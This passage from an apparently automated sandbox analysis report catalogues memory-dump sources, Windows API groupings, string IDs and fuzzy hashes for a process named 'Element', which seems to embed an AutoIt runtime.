                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                    • Instruction ID: a6db6c7743900a15e9c1acf89d144358113554d93846cea5a449a69dfca87bff
                    • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                    • Instruction Fuzzy Hash: 6E416D32A097D286E7708F24E844B9A77A1F784BA5F144375DAAC47BA9CF3CD845CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: NameName::
                    • String ID: %lf
                    • API String ID: 1333004437-2891890143
                    • Opcode ID: d5f16a7c5467462be1cf5b964019ae1b2bde45019dae381a265a9ba1ad95e400
                    • Instruction ID: 54eceebae92442c13e86fe516eeb118ccd7f70138e918802bfc0fbc20f0bc2fd
                    • Opcode Fuzzy Hash: d5f16a7c5467462be1cf5b964019ae1b2bde45019dae381a265a9ba1ad95e400
                    • Instruction Fuzzy Hash: 1131E871604B84B5FA11EB25B8782EA77A4FB75BC4F148112EE8A93765DF38C1C78B40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateObjectStock
                    • String ID: SysMonthCal32
                    • API String ID: 2671490118-1439706946
                    • Opcode ID: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                    • Instruction ID: a109fd6a5950597a7f85c915e65ef840638c9f0c7eaacd7a74c3ec7dbf16fd65
                    • Opcode Fuzzy Hash: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                    • Instruction Fuzzy Hash: 46416E326086C2CAE370CF15E844B5AB7A1F788791F504235EADD43A99DF3CD8858F40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyObjectStock
                    • String ID: msctls_updown32
                    • API String ID: 1752125012-2298589950
                    • Opcode ID: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                    • Instruction ID: 1f7e60f94b28c99a38bec1a8fe66149caed7b45e2c9a6613217a43e159563f4c
                    • Opcode Fuzzy Hash: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                    • Instruction Fuzzy Hash: 87316D76A18B8196EB60CF15E8903AA7361FB95B92F108175DA8D83B99CF3CD845CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateMoveObjectStock
                    • String ID: Listbox
                    • API String ID: 3747482310-2633736733
                    • Opcode ID: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                    • Instruction ID: c87228f974679e3cf9b8295c28416720c8d7724372f841707eed916a979c0de3
                    • Opcode Fuzzy Hash: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                    • Instruction Fuzzy Hash: F6313C366087C186E770CF15B844A5AB7A5F788BA1F508225EAE903B99CF3DD885CF40
                    APIs
                    • GetOpenFileNameW.COMDLG32 ref: 00007FF6C58BB0D8
                      • Part of subcall function 00007FF6C5875A50: GetFullPathNameW.KERNEL32(?,00007FF6C5875A3D,?,00007FF6C5874C50,?,?,?,00007FF6C587109E), ref: 00007FF6C5875A7B
                      • Part of subcall function 00007FF6C5874694: GetLongPathNameW.KERNEL32 ref: 00007FF6C58746B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen
                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                    • API String ID: 779396738-2360590182
                    • Opcode ID: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                    • Instruction ID: e173aafaff7d3efcfb9d45a8ee1d81ff0d6011a46bac6cc0ea8efeae1b04902f
                    • Opcode Fuzzy Hash: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                    • Instruction Fuzzy Hash: F8315862709B9289E710DF22D8401AD77A8FB49FC5F984175EA8C83B6ADF3CD945CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: msctls_trackbar32
                    • API String ID: 1025951953-1010561917
                    • Opcode ID: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                    • Instruction ID: 1fdd4a8440b89bbacd21bee33674192a409bc52ad1b049d140b7f074c4ec6f90
                    • Opcode Fuzzy Hash: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                    • Instruction Fuzzy Hash: 40312732A187D18AE3608F15A844B5AB7A5F788B91F144279EB9943B59CF38D8458B04
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                    • String ID: csm
                    • API String ID: 2280078643-1018135373
                    • Opcode ID: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                    • Instruction ID: 91e16a500e22ddea2fe23631c3a8d8b07afeea46fc01e126f3522452a6045f4d
                    • Opcode Fuzzy Hash: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                    • Instruction Fuzzy Hash: 8821493660969286E7319F12E84426E7760FB85FA6F404225DEDD47B99CF3DE886CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                    • Instruction ID: a93c7b9cd0cae6d00e2fdb70e83d7ad3390f3337c2702d55908decd90ad740c5
                    • Opcode Fuzzy Hash: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                    • Instruction Fuzzy Hash: 18E0ED25906B46C2EF159F10EC5837423A0FB09F56F451474C99D86356EFBCEE95C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                    • Instruction ID: 99fae8cc47b1bf5cac44bcccbdcd7981f88465edb8902e349e3e17d2fa5c3ebb
                    • Opcode Fuzzy Hash: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                    • Instruction Fuzzy Hash: D0E0ED21A06B4281EF149F10EC1837423A0FB08F9AF440475D99DC5355EF7CDAA6C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                    • Instruction ID: cb68aa9d98a22f0a4bb16f3bac789afa0ee0f6309d8132feba3949feaf2ed5aa
                    • Opcode Fuzzy Hash: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                    • Instruction Fuzzy Hash: A9E0C921A16B4681EF148F21EC1836422A0EB08F56F441474D99D85355EF7C9E95C340
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                    • Instruction ID: d8b6f6ce9c8ab81109475fe4bae1f3588307a160c0c7f7a6edbc0951030e2157
                    • Opcode Fuzzy Hash: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                    • Instruction Fuzzy Hash: D6D1F666B05BA6C6EB14DF66C8502AD37B0FB98F8AB114422DF8D87B54DF39D844C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: FileWrite$ConsoleErrorLastOutput
                    • String ID:
                    • API String ID: 2718003287-0
                    • Opcode ID: f9cd17b3ff201c4533b262b684ff58a946f570603ec51d8f639a374be169425f
                    • Instruction ID: ca112ab8df9e6763ba4d65f3b3013f1d29d6df9ceba10c0bda52fdcd0dba8c89
                    • Opcode Fuzzy Hash: f9cd17b3ff201c4533b262b684ff58a946f570603ec51d8f639a374be169425f
                    • Instruction Fuzzy Hash: 9BD1C1B2B14A8499F711CFB9D4683EC37B2F364798F144216DE99A7B99DA38C487C300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                    • Instruction ID: 990d9e91d3c705f26f0c85e8fa2926d75262d08ebb83606abdf8f9b0f1904ff7
                    • Opcode Fuzzy Hash: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                    • Instruction Fuzzy Hash: 5AD14D76B05B819AEB10DF65D8801EC33B5FB84B89B404476DE8D97B6ADF38E919C340
                    APIs
                    • ReadFile.KERNEL32(?,?,00007FF6C587475D,?,?,?,00007FF6C5878FCF,?,?,?,?,?,?,?,00007FF6C5879D60), ref: 00007FF6C5879F34
                    • SetFilePointerEx.KERNEL32(?,?,00007FF6C587475D,?,?,?,00007FF6C5878FCF,?,?,?,?,?,?,?,00007FF6C5879D60), ref: 00007FF6C58BD886
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: File$PointerRead
                    • String ID:
                    • API String ID: 3154509469-0
                    • Opcode ID: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                    • Instruction ID: e14cc26796e5f8374cbc990623c856fd84caac2e9f1bc808690b184fdc9e0434
                    • Opcode Fuzzy Hash: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                    • Instruction Fuzzy Hash: 4DB1AD32B0AA6286EB21DF25E854739B3A5FB45F92F104671DADE87791DF3CE8418700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ConsoleErrorLastMode
                    • String ID:
                    • API String ID: 953036326-0
                    • Opcode ID: 3cb501126546805e01c37bd62a3aa9980fde5b9f0bcf732b8eeb6cd4c0035e9d
                    • Instruction ID: 4a9f5d6b20c684ad9cb7fa06b8ab878c5e71bc657b6641aa0cfeef4a1d0f104b
                    • Opcode Fuzzy Hash: 3cb501126546805e01c37bd62a3aa9980fde5b9f0bcf732b8eeb6cd4c0035e9d
                    • Instruction Fuzzy Hash: C991D3B2B00690A9FB65DF7598B83EE2BE4F324B98F544109DE4A57A95DB34C4CBC700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID:
                    • API String ID: 2943138195-0
                    • Opcode ID: ead3e3fe56ae78ae79c8d412f060696eedce36c7b051d8abb241e36914d6c570
                    • Instruction ID: a373d32b6a942a604c8d67fc968993e23ec1abd57a527ae28e337ff947c4843b
                    • Opcode Fuzzy Hash: ead3e3fe56ae78ae79c8d412f060696eedce36c7b051d8abb241e36914d6c570
                    • Instruction Fuzzy Hash: 8891AC76A00B50B9FB11AFA4D8783EC37B0B324798F548015EE495B6A5DB78C8C7CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                    • Instruction ID: 56a817122d5449c97366df914b2155714bf10f76d9a4b5e719ba17f170321229
                    • Opcode Fuzzy Hash: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                    • Instruction Fuzzy Hash: F9417032A04B9A81EA508F15DC9457A33A4BB44F96F5541B6CA9FC3261DF3CEC858350
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert
                    • String ID:
                    • API String ID: 3076010158-0
                    • Opcode ID: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                    • Instruction ID: 78edb1c270ecf8b0c1edc9ad0cd3e69bc010357ff5ce6ccce010a88debcb0752
                    • Opcode Fuzzy Hash: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                    • Instruction Fuzzy Hash: 04417832A05B918AEB10CF26D8801AE37A6FB44F85F14007ADF8D97765CF38E856C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                    • String ID:
                    • API String ID: 4141327611-0
                    • Opcode ID: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                    • Instruction ID: 73443b5535c013f5a500f90e342510d7d936274e45cdcbf6cf08f30aca85d89b
                    • Opcode Fuzzy Hash: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                    • Instruction Fuzzy Hash: 6141E371A0E7A286FB65DF15D8443796290EFA0F92F149134EACE8AAC5DF3CDC418700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
